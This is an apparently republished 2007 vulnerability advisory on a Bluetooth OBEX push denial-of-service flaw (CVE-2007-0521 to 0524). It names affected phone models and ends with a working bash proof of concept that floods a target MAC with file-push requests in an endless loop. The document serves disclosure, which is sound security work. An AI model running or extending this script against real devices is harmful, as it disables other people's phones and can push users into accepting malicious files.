Bug: Bluetooth DoS by obex push [readable] ( Ascii Version )

Search:
WLB2

Bluetooth DoS by obex push [readable]

Published
Credit
Risk
2007.01.28
Stefan Ekerfelt and Armin Hornung
Low
CWE
CVE
Local
Remote
N/A
CVE-2007-0524
CVE-2007-0523
CVE-2007-0522
CVE-2007-0521
No
Yes

Sorry for the trouble with the wrong characters, below the corrected text with attachment in plain text:

Using ussp-push [1], it is possible to send out files very quickly. By continuously trying to push a file, the target is
flooded with prompts whether to accept the file or not, which disables any other usage on the phone, including the
ability to turn off Bluetooth.
We confirmed the attack to work on the following phones (all tested ones!):

- Sony Ericsson K700i
- Nokia N70
- Motorola MOTORAZR V3
- Sony Ericsson W810i
- LG Chocolate KG800

and expect nearly all available phones with Bluetooth to be vulnerable (in contrary to the previous DoS by l2ping).

A proof-of-concept code is attached, using ussp-push and targeting a known MAC. This could be easily extended to target
all visible devices.
Plus, a user could be forced to accept a possibly malicious file with this attack. Using only one Bluetooth-Dongle, we
were able to practically disable three phones simlutaneously.

Best regards,
Stefan Ekerfelt and Armin Hornung

[1] http://www.xmailserver.org/ussp-push.html

Proof-of-concept code:
------------------------------

#!/bin/bash

checkOPUSH()
{
MAC=$1
OCHAN=$(sdptool search --bdaddr $MAC OPUSH | grep Channel:)
if test "$OCHAN" != ""
then
OCHAN=$(echo $OCHAN | awk '/Channel:/ { print $2 }')
return $OCHAN
fi
return 0
}

if test $# -ne 2
then
echo "Usage: $0 <bdaddr> <filename>"
exit 127
fi

MAC=$1
FILENAME=$2

checkOPUSH $1
OCHAN=$?

if test $OCHAN -eq 0
then
echo "Couldn't connect to $MAC via OBEX push."
exit 127
fi

while true
do
./ussp-push $MAC@$OCHAN $FILENAME $FILENAME
done

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version